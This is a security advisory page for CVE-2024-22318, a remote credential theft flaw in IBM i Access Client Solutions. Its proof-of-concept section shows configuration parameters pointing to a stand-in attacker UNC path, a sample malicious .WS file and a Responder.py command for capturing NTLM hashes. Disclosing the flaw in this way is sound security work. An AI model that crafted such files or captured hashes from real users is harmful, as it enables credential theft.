Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- IBM i Access Client Solutions Remote Credential Theft[6]
- Authored by hyp3rlinx[7] | Site hyp3rlinx.altervista.org[8]
-
IBM i Access Client Solutions (ACS) versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 suffer from a remote credential theft vulnerability.
- advisories | CVE-2024-22318[9]
- SHA-256 |
964bea5b3a06403a9b60507182c010125d6a43a4aeb3c4908a6fba63b7df0c99
- Download[10] | Favorite[11] | View[12]
Change Mirror[13] Download[14]
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.ibm.com
[Product]
IBM i Access Client Solutions
[Versions]
All
[Remediation/Fixes]
None
[Vulnerability Type]
Remote Credential Theft
[CVE Reference]
CVE-2024-22318
[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.
[References]
https://www.ibm.com/support/pages/node/7116091
[Exploit/POC]
The client access .HOD File vulnerable parameters:
1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
[KeyRemapFile]
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv
The client access legacy .WS File vulnerable parameters:
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c
Example, client access older .WS file
[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250
[Network Access]
Remote
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
File Tags
- ActiveX[20] (932)
- Advisory[21] (84,116)
- Arbitrary[22] (16,529)
- BBS[23] (2,859)
- Bypass[24] (1,811)
- CGI[25] (1,031)
- Code Execution[26] (7,539)
- Conference[27] (686)
- Cracker[28] (844)
- CSRF[29] (3,366)
- DoS[30] (24,273)
- Encryption[31] (2,380)
- Exploit[32] (52,508)
- File Inclusion[33] (4,242)
- File Upload[34] (982)
- Firewall[35] (822)
- Info Disclosure[36] (2,824)
- Intrusion Detection[37] (904)
- Java[38] (3,112)
- JavaScript[39] (884)
- Kernel[40] (6,915)
- Local[41] (14,635)
- Magazine[42] (586)
- Overflow[43] (12,966)
- Perl[44] (1,430)
- PHP[45] (5,170)
- Proof of Concept[46] (2,362)
- Protocol[47] (3,682)
- Python[48] (1,588)
- Remote[49] (31,220)
- Root[50] (3,612)
- Rootkit[51] (518)
- Ruby[52] (616)
- Scanner[53] (1,647)
- Security Tool[54] (7,957)
- Shell[55] (3,226)
- Shellcode[56] (1,216)
- Sniffer[57] (898)
- Spoof[58] (2,236)
- SQL Injection[59] (16,472)
- TCP[60] (2,420)
- Trojan[61] (688)
- UDP[62] (896)
- Virus[63] (668)
- Vulnerability[64] (32,388)
- Web[65] (9,823)
- Whitepaper[66] (3,764)
- x86[67] (966)
- XSS[68] (18,096)
- Other[69]
File Archives
- February 2024[70]
- January 2024[71]
- December 2023[72]
- November 2023[73]
- October 2023[74]
- September 2023[75]
- August 2023[76]
- July 2023[77]
- June 2023[78]
- May 2023[79]
- April 2023[80]
- March 2023[81]
- Older[82]
Systems
- AIX[83] (429)
- Apple[84] (2,060)
- BSD[85] (375)
- CentOS[86] (57)
- Cisco[87] (1,926)
- Debian[88] (6,962)
- Fedora[89] (1,693)
- FreeBSD[90] (1,246)
- Gentoo[91] (4,441)
- HPUX[92] (880)
- iOS[93] (369)
- iPhone[94] (108)
- IRIX[95] (220)
- Juniper[96] (69)
- Linux[97] (48,534)
- Mac OS X[98] (691)
- Mandriva[99] (3,105)
- NetBSD[100] (256)
- OpenBSD[101] (487)
- RedHat[102] (15,056)
- Slackware[103] (941)
- Solaris[104] (1,611)
- SUSE[105] (1,444)
- Ubuntu[106] (9,273)
- UNIX[107] (9,365)
- UnixWare[108] (187)
- Windows[109] (6,622)
- Other[110]
- Services
- Security Services[121]
- Hosting By
- Rokasec[122]